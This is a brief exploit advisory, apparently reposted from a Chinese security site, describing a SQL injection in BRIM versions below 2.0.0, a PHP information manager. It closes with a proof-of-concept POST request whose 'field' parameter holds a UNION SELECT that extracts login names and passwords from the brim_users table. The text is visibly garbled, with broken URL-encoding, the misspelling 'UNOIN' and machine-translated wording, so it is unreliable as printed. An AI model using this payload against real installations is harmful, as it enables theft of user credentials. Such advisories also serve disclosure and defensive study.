BRIM <2.0.0 SQL Injection Information
Title: BRIM <2.0.0 SQL Injection
Author: ifnull www.2cto.com
Test Platform: Apache/2.2.3, PHP/5.1.6, MySQL 5.0.45, although it can run in any environment.
Example uses MySQL 5 query escape but can easily be ported to prior versions of MySQL.
Description: Unlike CVE-2008-4082, this will work with or
Magic_quotes_gpc enabled. Like the last exploit however, you must first
Create an account and enable "tasks". By default anyone can create
Account and the accounts are automatically approved.
Program Information
Version: <2.0.0
Address: http://sourceforge.net/projects/brim/
Description:
BRIM is a MVC framework, written in PHP and based on
Items with a hierarchical relationship. The list of plugins make BRIM
Information Manager with plugins like bookmarks, a calendar, contacts
Tasks, notes, RSS etc. www.2cto.com The application is multilingual.
Proof of ConceptPOST
URI:/index. php
Data: plugin = tasks & field = 1% 3D1% 20 UNOIN % 20 SELECT % 201% 2C2% 2C3% 2C4% 2 CCONCAT (loginname % 2C0x3a % 2 Cpassword) % 2C6% 2C7% 2C8% 2C9% 2C10% 2C11% 2C12% 2C13% 2C14% 2C15% 2C16% 2C17% 20 from % 20brim_users -- & value = asdf & action = searchTasks